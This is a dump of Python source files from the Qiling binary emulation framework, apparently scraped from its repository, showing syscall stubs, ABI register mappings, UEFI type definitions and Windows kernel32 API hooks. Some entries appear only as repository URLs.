| if leaffunc is None: 19 | ql.log.exception(f'leaf {ah:02x}h of INT 20h is not implemented') 20 | raise NotImplementedError() 21 | 22 | leaffunc(ql) 23 | -------------------------------------------------------------------------------- /qiling/os/freebsd/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/freebsd/__init__.py -------------------------------------------------------------------------------- /qiling/os/linux/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/linux/__init__.py -------------------------------------------------------------------------------- /qiling/os/linux/fncc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from typing import Any, Mapping 7 | 8 | from qiling import Qiling 9 | from qiling.const import QL_INTERCEPT 10 | 11 | def linux_kernel_api(params: Mapping[str, Any] = {}, passthru: bool = False): 12 | def decorator(func): 13 | def wrapper(ql: Qiling, pc: int, api_name: str): 14 | onenter = ql.os.user_defined_api[QL_INTERCEPT.ENTER].get(api_name) 15 | onexit = ql.os.user_defined_api[QL_INTERCEPT.EXIT].get(api_name) 16 | 17 | return ql.os.call(pc, func, params, onenter, onexit, passthru=passthru) 18 | 19 | return wrapper 20 | 21 | return decorator 22 | -------------------------------------------------------------------------------- /qiling/os/linux/kernel_api/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | from .kernel_api import * 6 | -------------------------------------------------------------------------------- /qiling/os/linux/utils.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | 7 | -------------------------------------------------------------------------------- /qiling/os/macos/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | # virtual addr : 0x00000000000 - 0x7FFFFFFFFFF 7 | # 64 bit case no aslr: 8 | # 0x000000000 - 0x100000000 page zero 9 | # 0x100000000 - 0xXXXXXXXXX binary 10 | # 0xXXXXXXXXX - 0xYYYYYYYYY dyld 11 | # 0x7ffcf0000000 - 0x7ffd09a00000 stack 12 | # 0x7ffbf0100000 - 0x7ffcf0000000 heap 13 | # 0x7FFF00000000 - 0x7fffffe00000 shared origen 14 | # kernel space : 0x80000000000 - 0xFFFFFFFFFFF 15 | # other space : 0x100000000000 - 0x17FFFFFFFFFF -------------------------------------------------------------------------------- /qiling/os/macos/events/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/macos/events/__init__.py -------------------------------------------------------------------------------- /qiling/os/macos/fncc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from typing import Any, Mapping 7 | 8 | from qiling import Qiling 9 | from qiling.const import QL_INTERCEPT 10 | 11 | def macos_kernel_api(params: Mapping[str, Any] = {}, passthru: bool = False): 12 | def decorator(func): 13 | def wrapper(ql: Qiling, pc: int, api_name: str): 14 | onenter = ql.os.user_defined_api[QL_INTERCEPT.ENTER].get(api_name) 15 | onexit = ql.os.user_defined_api[QL_INTERCEPT.EXIT].get(api_name) 16 | 17 | return ql.os.call(pc, func, params, onenter, onexit, passthru=passthru) 18 | 19 | return wrapper 20 | 21 | return decorator 22 | -------------------------------------------------------------------------------- /qiling/os/macos/kernel_api/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | from .kernel_api import * 6 | -------------------------------------------------------------------------------- /qiling/os/macos/task.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | # task class not finished 7 | # TODO: finished 8 | class MachoTask(): 9 | def __init__(self): 10 | self.id = 9876 # random id 11 | self.min_offset = 0x00000000 12 | self.max_offset = 0xFFE00000 -------------------------------------------------------------------------------- /qiling/os/macos/thread.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import os 7 | 8 | from qiling.os.thread import * 9 | from qiling.os.macos.mach_port import * 10 | 11 | # TODO: finished 12 | class QlMachoThread(QlThread): 13 | 14 | def __init__(self, ql): 15 | super(QlMachoThread, self).__init__(ql) 16 | self.ql = ql 17 | self.id = 123 18 | self.port = MachPort(0x307) 19 | 20 | def stop(self): 21 | pass 22 | 23 | 24 | class QlMachoThreadManagement: 25 | 26 | def __init__(self, ql): 27 | self.ql = ql 28 | self.cur_thread = None 29 | -------------------------------------------------------------------------------- /qiling/os/mcu/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /qiling/os/mcu/const.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | -------------------------------------------------------------------------------- /qiling/os/posix/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/posix/__init__.py -------------------------------------------------------------------------------- /qiling/os/posix/stat.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import os 7 | 8 | class StatBase: 9 | def __init__(self, stat: os.stat_result): 10 | self._stat_buf = stat 11 | 12 | # Never iterate this object! 13 | def __getitem__(self, key): 14 | if type(key) is not str: 15 | raise TypeError 16 | 17 | if not key.startswith("__") and hasattr(self._stat_buf, key): 18 | return self._stat_buf.__getattribute__(key) 19 | 20 | return 0 21 | 22 | def __getattr__(self, key): 23 | return self.__getitem__(key) 24 | 25 | class Stat(StatBase): 26 | def __init__(self, path, dirfd=None): 27 | super().__init__(os.stat(path, dir_fd=dirfd)) 28 | 29 | class Fstat(StatBase): 30 | def __init__(self, fd: int): 31 | super().__init__(os.fstat(fd)) 32 | 33 | class Lstat(StatBase): 34 | def __init__(self, path, dirfd=None): 35 | super().__init__(os.lstat(path, dir_fd=dirfd)) 36 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | from .fcntl import * 6 | from .futex import * 7 | from .ioctl import * 8 | from .mman import * 9 | from .msg import * 10 | from .net import * 11 | from .personality import * 12 | from .poll import * 13 | from .prctl import * 14 | from .ptrace import * 15 | from .random import * 16 | from .resource import * 17 | from .sched import * 18 | from .select import * 19 | from .sendfile import * 20 | from .shm import * 21 | from .signal import * 22 | from .socket import * 23 | from .stat import * 24 | from .sysctl import * 25 | from .syscall import * 26 | from .sysinfo import * 27 | from .time import * 28 | from .types import * 29 | from .uio import * 30 | from .unistd import * 31 | from .utsname import * 32 | from .wait import * 33 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/abi/intel.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.x86_const import ( 6 | UC_X86_REG_EAX, UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDX, 7 | UC_X86_REG_ESI, UC_X86_REG_EDI, UC_X86_REG_EBP, UC_X86_REG_RDI, 8 | UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, 9 | UC_X86_REG_R9, UC_X86_REG_RAX 10 | ) 11 | 12 | from qiling.os.posix.syscall.abi import QlSyscallABI 13 | 14 | 15 | class QlIntel32(QlSyscallABI): 16 | """System call ABI for Intel-based 32-bit systems. 17 | """ 18 | 19 | _idreg = UC_X86_REG_EAX 20 | _argregs = (UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDX, UC_X86_REG_ESI, UC_X86_REG_EDI, UC_X86_REG_EBP) 21 | _retreg = UC_X86_REG_EAX 22 | 23 | 24 | class QlIntel64(QlSyscallABI): 25 | """System call ABI for Intel-based 64-bit systems. 26 | """ 27 | 28 | _idreg = UC_X86_REG_RAX 29 | _argregs = (UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9) 30 | _retreg = UC_X86_REG_RAX 31 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/abi/ppc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.ppc_const import ( 6 | UC_PPC_REG_0, UC_PPC_REG_3, UC_PPC_REG_4, UC_PPC_REG_5, 7 | UC_PPC_REG_6, UC_PPC_REG_7, UC_PPC_REG_8 8 | ) 9 | 10 | from qiling.os.posix.syscall.abi import QlSyscallABI 11 | 12 | 13 | class QlPPC(QlSyscallABI): 14 | """System call ABI for PowerPC systems. 15 | """ 16 | 17 | _idreg = UC_PPC_REG_0 18 | _argregs = (UC_PPC_REG_3, UC_PPC_REG_4, UC_PPC_REG_5, UC_PPC_REG_6, UC_PPC_REG_7, UC_PPC_REG_8) 19 | _retreg = UC_PPC_REG_3 20 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/abi/riscv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.riscv_const import ( 6 | UC_RISCV_REG_A0, UC_RISCV_REG_A1, UC_RISCV_REG_A2, UC_RISCV_REG_A3, 7 | UC_RISCV_REG_A4, UC_RISCV_REG_A5, UC_RISCV_REG_A7 8 | ) 9 | 10 | from qiling.os.posix.syscall.abi import QlSyscallABI 11 | 12 | 13 | class QlRiscV32(QlSyscallABI): 14 | """System call ABI for RISCV systems. 15 | """ 16 | 17 | _idreg = UC_RISCV_REG_A7 18 | _argregs = (UC_RISCV_REG_A0, UC_RISCV_REG_A1, UC_RISCV_REG_A2, UC_RISCV_REG_A3, UC_RISCV_REG_A4, UC_RISCV_REG_A5) 19 | _retreg = UC_RISCV_REG_A0 20 | 21 | 22 | QlRiscV64 = QlRiscV32 23 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/personality.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import os 7 | 8 | 9 | from qiling import Qiling 10 | from qiling.const import * 11 | 12 | def ql_syscall_personality(ql: Qiling, persona: int): 13 | regreturn = 0 14 | return regreturn 15 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/ptrace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def ql_syscall_ptrace(ql: Qiling, request: int, pid: int, addr: int, data: int): 9 | return 0 10 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import os 7 | 8 | from qiling import Qiling 9 | from qiling.os.posix.const import EFAULT 10 | 11 | def ql_syscall_getrandom(ql: Qiling, buf: int, buflen: int, flags: int): 12 | if not ql.mem.is_mapped(buf, buflen): 13 | return -EFAULT 14 | 15 | data = os.urandom(buflen) 16 | ql.mem.write(buf, data) 17 | 18 | ql.log.debug(f'getrandom() CONTENT: {data.hex(" ")}') 19 | 20 | return len(data) 21 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/signal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def ql_syscall_rt_sigaction(ql: Qiling, signum: int, act: int, oldact: int): 9 | if oldact: 10 | arr = ql.os.sigaction_act[signum] or [0] * 5 11 | data = b''.join(ql.pack32(key) for key in arr) 12 | 13 | ql.mem.write(oldact, data) 14 | 15 | if act: 16 | ql.os.sigaction_act[signum] = [ql.mem.read_ptr(act + 4 * i, 4) for i in range(5)] 17 | 18 | return 0 19 | 20 | 21 | def ql_syscall_rt_sigprocmask(ql: Qiling, how: int, nset: int, oset: int, sigsetsize: int): 22 | # SIG_BLOCK = 0x0 23 | # SIG_UNBLOCK = 0x1 24 | 25 | return 0 26 | 27 | 28 | def ql_syscall_signal(ql: Qiling, sig: int, sighandler: int): 29 | return 0 30 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/sysctl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | # from qiling import Qiling 7 | # 8 | # def ql_syscall___sysctl(ql: Qiling, name, namelen, bytes_oldlenp, size_oldlenp, bytes_newlen, size_newlen): 9 | # return 0 10 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/types.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def ql_syscall_gettid(ql: Qiling): 9 | if ql.os.thread_management: 10 | th = ql.os.thread_management.cur_thread 11 | regreturn = th.id 12 | else: 13 | # thread_management is None only if it is a single-threaded process. 14 | # In single-threaded process, the thread ID is equal to the process ID 15 | # per Posix documentation. 16 | regreturn = ql.os.pid 17 | 18 | return regreturn 19 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/utsname.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | 8 | def ql_syscall_uname(ql: Qiling, buf: int): 9 | UTSLEN = 65 10 | 11 | fields = ( 12 | b'QilingOS', # sysname 13 | b'ql_vm', # nodename 14 | b'99.0-RELEASE', # release 15 | b'QilingOS 99.0-RELEASE r1', # version 16 | b'ql_processor', # machine 17 | b'' # domainname 18 | ) 19 | 20 | for i, f in enumerate(fields): 21 | ql.mem.write(buf + i * UTSLEN, f.ljust(UTSLEN, b'\x00')) 22 | 23 | return 0 24 | -------------------------------------------------------------------------------- /qiling/os/posix/syscall/wait.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import os 7 | 8 | from qiling import Qiling 9 | from qiling.os.posix.const import ECHILD 10 | 11 | def ql_syscall_wait4(ql: Qiling, pid: int, wstatus: int, options: int, rusage: int): 12 | pid = ql.os.utils.as_signed(pid, 32) 13 | options = ql.os.utils.as_signed(options, 32) 14 | 15 | try: 16 | spid, status, _ = os.wait4(pid, options) 17 | except ChildProcessError: 18 | return -ECHILD 19 | 20 | if wstatus: 21 | ql.mem.write_ptr(wstatus, status, 4) 22 | 23 | return spid 24 | -------------------------------------------------------------------------------- /qiling/os/qnx/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/qnx/__init__.py -------------------------------------------------------------------------------- /qiling/os/qnx/helpers.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | from ctypes import c_int32 6 | 7 | class QnxConn: 8 | def __init__(self, pid, chid, fd = None): 9 | self.__pid = pid # Process Id 10 | self.__chid = chid # Channel Id 11 | self.__fd = fd # File Descriptor 12 | 13 | @property 14 | def chid(self): 15 | return self.__chid 16 | 17 | @property 18 | def fd(self): 19 | return self.__fd 20 | 21 | @fd.setter 22 | def fd(self, value): 23 | self.__fd = value 24 | 25 | @property 26 | def pid(self): 27 | return self.__pid 28 | 29 | def get_message_body(ql, msg, parts): 30 | parts = c_int32(parts).value 31 | if parts >= 0: 32 | return ql.mem.read(ql.unpack32(ql.mem.read(msg, 4)), ql.unpack32(ql.mem.read(msg + 4, 4))) 33 | elif parts < 0: 34 | return ql.mem.read(msg, -parts) 35 | 36 | def ux32s(value): 37 | return "0x%s" % ("00000000%x" % (value & 0xffffffff))[-8:] 38 | -------------------------------------------------------------------------------- /qiling/os/thread.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from abc import abstractmethod 7 | from gevent import Greenlet 8 | 9 | from qiling import Qiling 10 | 11 | class QlThread(Greenlet): 12 | 13 | def __init__(self, ql: Qiling): 14 | super().__init__() 15 | 16 | self.ql = ql 17 | self.log_file_fd = None 18 | 19 | def __str__(self) -> str: 20 | return f"QlThread {self.get_id()}" 21 | 22 | # the common functions which are used in qiling core. 23 | # these functions must be implemented in child class. 24 | 25 | # like pthread_self(), return the id of currunt thread. 26 | # @abstractmethod 27 | def get_id(self): 28 | pass 29 | 30 | # like pthread_exit(), terminate current thread. 31 | # @abstractmethod 32 | def exit(self): 33 | pass 34 | 35 | @abstractmethod 36 | def stop(self): 37 | pass 38 | 39 | -------------------------------------------------------------------------------- /qiling/os/uefi/UefiBaseType.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling.os.uefi.ProcessorBind import VOID, UINT8, UINT16, UINT32, UINT64, UINTN, STRUCT, PTR 7 | 8 | 9 | class EFI_GUID(STRUCT): 10 | _fields_ = [ 11 | ('Data1', UINT32), 12 | ('Data2', UINT16), 13 | ('Data3', UINT16), 14 | ('Data4', UINT8 * 8) 15 | ] 16 | 17 | 18 | EFI_STATUS = UINTN 19 | EFI_HANDLE = PTR(VOID) 20 | EFI_EVENT = PTR(VOID) 21 | EFI_TPL = UINTN 22 | EFI_LBA = UINT64 23 | EFI_PHYSICAL_ADDRESS = UINT64 24 | EFI_VIRTUAL_ADDRESS = UINT64 25 | 26 | 27 | class EFI_TIME(STRUCT): 28 | _fields_ = [ 29 | ('Year', UINT16), 30 | ('Month', UINT8), 31 | ('Day', UINT8), 32 | ('Hour', UINT8), 33 | ('Minute', UINT8), 34 | ('Second', UINT8), 35 | ('Pad1', UINT8), 36 | ('Nanosecond', UINT32), 37 | ('TimeZone', UINT16), 38 | ('Daylight', UINT8), 39 | ('Pad2', UINT8) 40 | ] 41 | 42 | 43 | __all__ = [ 44 | 'EFI_GUID', 45 | 'EFI_STATUS', 46 | 'EFI_HANDLE', 47 | 'EFI_EVENT', 48 | 'EFI_TPL', 49 | 'EFI_LBA', 50 | 'EFI_PHYSICAL_ADDRESS', 51 | 'EFI_VIRTUAL_ADDRESS', 52 | 'EFI_TIME' 53 | ] 54 | -------------------------------------------------------------------------------- /qiling/os/uefi/__init__.py: -------------------------------------------------------------------------------- 1 | import csv 2 | import inspect 3 | 4 | from typing import Dict 5 | from pathlib import Path 6 | 7 | 8 | def __init_guids_db() -> Dict[str, str]: 9 | """Initialize GUIDs dictionary from a local database. 10 | """ 11 | 12 | csv_path = Path(inspect.getfile(__init_guids_db)).parent / 'guids.csv' 13 | 14 | with csv_path.open('r') as guids_file: 15 | guids_reader = csv.reader(guids_file) 16 | 17 | return dict(tuple(entry) for entry in guids_reader) 18 | 19 | guids_db = __init_guids_db() 20 | -------------------------------------------------------------------------------- /qiling/os/uefi/fncc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from typing import Any, Mapping 7 | 8 | from qiling import Qiling 9 | from qiling.const import QL_INTERCEPT 10 | 11 | def dxeapi(params: Mapping[str, Any] = {}): 12 | def decorator(func): 13 | def wrapper(ql: Qiling): 14 | pc = ql.arch.regs.arch_pc 15 | fname = func.__name__ 16 | 17 | f = ql.os.user_defined_api[QL_INTERCEPT.CALL].get(fname) or func 18 | onenter = ql.os.user_defined_api[QL_INTERCEPT.ENTER].get(fname) 19 | onexit = ql.os.user_defined_api[QL_INTERCEPT.EXIT].get(fname) 20 | 21 | return ql.os.call(pc, f, params, onenter, onexit) 22 | 23 | return wrapper 24 | 25 | return decorator 26 | -------------------------------------------------------------------------------- /qiling/os/uefi/protocols/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/uefi/protocols/__init__.py -------------------------------------------------------------------------------- /qiling/os/windows/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/os/windows/__init__.py -------------------------------------------------------------------------------- /qiling/os/windows/dlls/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | from .advapi32 import * 6 | from .msvcrt import * 7 | from .user32 import * 8 | from .wininet import * 9 | from .msi import * 10 | from .ntdll import * 11 | from .ucrtbased import * 12 | from .wsock32 import * 13 | from .ole32 import * 14 | from .shlwapi import * 15 | from .crypt32 import * 16 | from .mscoree import * 17 | from .msvbvm60 import * 18 | from .shell32 import * 19 | from .ntoskrnl import * 20 | from .wudplatform import * 21 | from .oleaut32 import * 22 | from .kernel32 import * 23 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/const.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | IDCANCEL = 2 7 | 8 | IDI_APPLICATION = 32512 9 | IDI_ASTERISK = 32516 10 | IDI_ERROR = 32513 11 | IDI_EXCLAMATION = 32515 12 | IDI_HAND = 32513 13 | IDI_INFORMATION = 32516 14 | IDI_QUESTION = 32514 15 | IDI_SHIELD = 32518 16 | IDI_WARNING = 32515 17 | IDI_WINLOGO = 32517 -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/__init__.py: -------------------------------------------------------------------------------- 1 | from .errhandlingapi import * 2 | from .fibersapi import * 3 | from .fileapi import * 4 | from .handleapi import * 5 | from .heapapi import * 6 | from .ioapiset import * 7 | from .libloaderapi import * 8 | from .memoryapi import * 9 | from .processenv import * 10 | from .processthreadsapi import * 11 | from .profileapi import * 12 | from .stringapiset import * 13 | from .synchapi import * 14 | from .sysinfoapi import * 15 | from .tlhelp32 import * 16 | from .winbase import * 17 | from .winnls import * 18 | from .winnt import * 19 | from .wow64apiset import * 20 | from .interlockedapi import * 21 | from .consoleapi import * 22 | from .consoleapi2 import * 23 | from .consoleapi3 import * 24 | from .debugapi import * 25 | from .psapi import * 26 | from .timezoneapi import * 27 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/consoleapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | # BOOL WINAPI GetConsoleMode( 11 | # _In_ HANDLE hConsoleHandle, 12 | # _Out_ LPDWORD lpMode 13 | # ); 14 | @winsdkapi(cc=STDCALL, params={ 15 | 'hConsoleHandle' : HANDLE, 16 | 'lpMode' : LPDWORD 17 | }) 18 | def hook_GetConsoleMode(ql: Qiling, address: int, params): 19 | return 1 20 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/consoleapi2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | # BOOL WINAPI SetConsoleTitle( 11 | # _In_ LPCTSTR lpConsoleTitle 12 | # ); 13 | @winsdkapi(cc=STDCALL, params={ 14 | 'lpConsoleTitle' : LPCTSTR 15 | }) 16 | def hook_SetConsoleTitleW(ql: Qiling, address: int, params): 17 | return 1 18 | 19 | # BOOL WINAPI GetConsoleScreenBufferInfo( 20 | # _In_ HANDLE hConsoleOutput, 21 | # _Out_ PCONSOLE_SCREEN_BUFFER_INFO lpConsoleScreenBufferInfo 22 | # ); 23 | @winsdkapi(cc=STDCALL, params={ 24 | 'hConsoleOutput' : HANDLE, 25 | 'lpConsoleScreenBufferInfo' : PCONSOLE_SCREEN_BUFFER_INFO 26 | }) 27 | def hook_GetConsoleScreenBufferInfo(ql: Qiling, address: int, params): 28 | # Todo should we really? 29 | return 1 30 | 31 | # BOOL WINAPI SetConsoleTextAttribute( 32 | # _In_ HANDLE hConsoleOutput, 33 | # _In_ WORD wAttributes 34 | # ); 35 | @winsdkapi(cc=STDCALL, params={ 36 | 'hConsoleOutput' : HANDLE, 37 | 'wAttributes' : WORD 38 | }) 39 | def hook_SetConsoleTextAttribute(ql: Qiling, address: int, params): 40 | return 1 41 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/consoleapi3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | from qiling.os.windows.handle import Handle 10 | 11 | # HWND WINAPI GetConsoleWindow(void); 12 | @winsdkapi(cc=STDCALL, params={}) 13 | def hook_GetConsoleWindow(ql: Qiling, address: int, params): 14 | handle = Handle(name="console_window") 15 | ql.os.handle_manager.append(handle) 16 | 17 | return handle.id 18 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/interlockedapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | from qiling.os.windows.handle import Handle 10 | 11 | # void InitializeSListHead( 12 | # PSLIST_HEADER ListHead 13 | # ); 14 | @winsdkapi(cc=STDCALL, params={ 15 | 'ListHead' : PSLIST_HEADER 16 | }) 17 | def hook_InitializeSListHead(ql: Qiling, address: int, params): 18 | ListHead = params["ListHead"] 19 | 20 | handle = Handle(obj=[], id=ListHead) 21 | ql.os.handle_manager.append(handle) 22 | 23 | return 0 24 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/ioapiset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.const import * 9 | from qiling.os.windows.fncc import * 10 | 11 | # BOOL DeviceIoControl( 12 | # HANDLE hDevice, 13 | # DWORD dwIoControlCode, 14 | # LPVOID lpInBuffer, 15 | # DWORD nInBufferSize, 16 | # LPVOID lpOutBuffer, 17 | # DWORD nOutBufferSize, 18 | # LPDWORD lpBytesReturned, 19 | # LPOVERLAPPED lpOverlapped 20 | # ); 21 | @winsdkapi(cc=STDCALL, params={ 22 | 'hDevice' : HANDLE, 23 | 'dwIoControlCode' : DWORD, 24 | 'lpInBuffer' : LPVOID, 25 | 'nInBufferSize' : DWORD, 26 | 'lpOutBuffer' : LPVOID, 27 | 'nOutBufferSize' : DWORD, 28 | 'lpBytesReturned' : LPDWORD, 29 | 'lpOverlapped' : LPOVERLAPPED 30 | }) 31 | def hook_DeviceIoControl(ql: Qiling, address: int, params): 32 | # operation = params["dwIoControlCode"] 33 | # data = params["lpInBuffer"] 34 | # output = params["lpOutBuffer"] 35 | # output_size = params["lpBytesReturned"] 36 | 37 | # TODO implement operations. Did not find controlCodes values 38 | return 1 39 | -------------------------------------------------------------------------------- /qiling/os/windows/dlls/kernel32/profileapi.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from qiling import Qiling 7 | from qiling.os.windows.api import * 8 | from qiling.os.windows.fncc import * 9 | 10 | # BOOL QueryPerformanceCounter( 11 | # LARGE_INTEGER *lpPerformanceCount 12 | # ); 13 | @winsdkapi(cc=STDCALL, params={ 14 | 'lpPerformanceCount' : POINTER 15 | }) 16 | def hook_QueryPerformanceCounter(ql: Qiling, address: int, params): 17 | return 0 18 | 19 | # BOOL QueryPerformanceFrequency( 20 | # LARGE_INTEGER *lpFrequency 21 | # ); 22 | @winsdkapi(cc=STDCALL, params={ 23 | 'lpFrequency' : POINTER 24 | }) 25 | def hook_QueryPerformanceFrequency(ql: Qiling, address: int, params): 26 | lpFrequency = params['lpFrequency'] 27 | 28 | ql.mem.write_ptr(lpFrequency, 10000000, 8) 29 | 30 | return 1 31 | -------------------------------------------------------------------------------- 